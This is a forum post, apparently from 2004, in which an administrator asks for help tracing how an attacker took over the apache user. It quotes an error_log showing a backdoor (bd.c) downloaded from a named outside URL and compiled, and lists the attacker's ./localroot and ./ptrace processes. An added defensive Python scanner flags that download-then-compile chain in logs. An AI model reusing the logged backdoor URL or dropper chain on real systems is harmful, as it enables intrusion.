01-23-04 11:56 PM
My Related URL References:
[http://www.webhostingtalk.com/showt...threadid=169024] and
[http://www.experts-exchange.com/Sec...Q_20691048.html]
I need help identifying an unknown exploit of some kind that allowed a
remote attacker to gain control of the apache user, and compile a back door
program in the /tmp directory (
http://www.myxpls.hpg.com.br/exploit/locais/bd.c) found in error_log here:
--error_log snippet--
sh: option `-c' requires an argument
--20:06:54-- http://www.myxpls.hpg.com.br/exploit/locais/bd.c
=> `bd.c'
Resolving www.myxpls.hpg.com.br... done.
Connecting to www.myxpls.hpg.com.br[200.226.137.9]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1,828 [text/plain]
0K . 100% 1.74 MB/s
20:06:54 (1.74 MB/s) - `bd.c' saved [1828/1828]
bd.c: In function `main':
bd.c:77: warning: comparison between pointer and integer
--error_log snippet--
When I stepped in, the user was running the backdoor as the apache user in
memory disguised as httpd and had further re-run the backdoor program
(/tmp/localroot) and (/tmp/ptrace), shown from 'ps waux' below:
apache 32744 0.0 0.0 1364 272 ? S Jul25 0:00 ./ptrace
apache 32767 98.6 0.0 1348 288 ? R Jul25 378:36 ./localroot
apache 317 0.0 0.0 1348 296 ? S Jul25 0:00 httpd
I thought I was all about security until this happened. I was up2date,
firewalled, had turned off all services/ports not being used, CGI suexec'd,
php_safe_mode=true, etc... before this happened.
I've looked for .bash_history files, scanned apache logs ( both SSL and
error_logs and client access_logs ), /var/log/messages, recently uploaded
client files, recently added files to the system, recently modified system
files, etc... for anomalies ( SEGFAULTs, SIGHUPs, PHP, forum board abuse ),
and compared md5sum of system binaries with uninfected systems, all for
naught! The only pieces of information I have about how this exploit occurred
are in the apache error_log snippet above.
Does anyone have experience with this sort of thing?
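A defender-side check suggested by the error_log snippet above, as an added example that is not from the original post: a small Python scanner that flags shell, download and compiler output in an Apache error_log (none of which a web server should ever emit) and reports when a download is followed by a compile, the dropper chain seen here. The sample log is constructed and the download host is a placeholder.

```python
import re
from collections import namedtuple

Finding = namedtuple("Finding", "line_no category text")

# Activity that does not belong in a web server's error_log: a shell being
# spawned, a file being fetched, a C source file being compiled. Patterns
# follow the wget and gcc output formats quoted in the post above.
PATTERNS = [
    ("shell", re.compile(r"^(sh|bash): ")),
    ("download", re.compile(r"^--\d{2}:\d{2}:\d{2}--\s+\S+://|=> `[^']+'|saved \[\d+/\d+\]")),
    ("compile", re.compile(r"^\S+\.c(:\d+)?: (In function|warning|error)")),
]

def scan_error_log(text):
    """Return a Finding for every line that matches one of PATTERNS."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        for category, rx in PATTERNS:
            if rx.search(line):
                findings.append(Finding(no, category, line))
                break
    return findings

def download_then_compile(findings):
    """True when a compile finding comes after a download finding."""
    seen_download = False
    for f in findings:
        if f.category == "download":
            seen_download = True
        elif f.category == "compile" and seen_download:
            return True
    return False

# Constructed sample modelled on the post's snippet (not the poster's real
# log); the host is a placeholder. The first line is ordinary Apache noise.
SAMPLE_ERROR_LOG = """\
[Fri Jul 25 20:06:50 2003] [error] [client 10.0.0.5] File does not exist: /var/www/html/favicon.ico
sh: option `-c' requires an argument
--20:06:54-- http://example.invalid/bd.c
=> `bd.c'
20:06:54 (1.74 MB/s) - `bd.c' saved [1828/1828]
bd.c: In function `main':
bd.c:77: warning: comparison between pointer and integer
"""

if __name__ == "__main__":
    hits = scan_error_log(SAMPLE_ERROR_LOG)
    for f in hits:
        print(f"line {f.line_no:3d} [{f.category}] {f.text}")
    print("download-then-compile chain:", download_then_compile(hits))
```

Run it against a real error_log with `scan_error_log(open(path).read())`; a true result from `download_then_compile` is worth treating as an incident on its own.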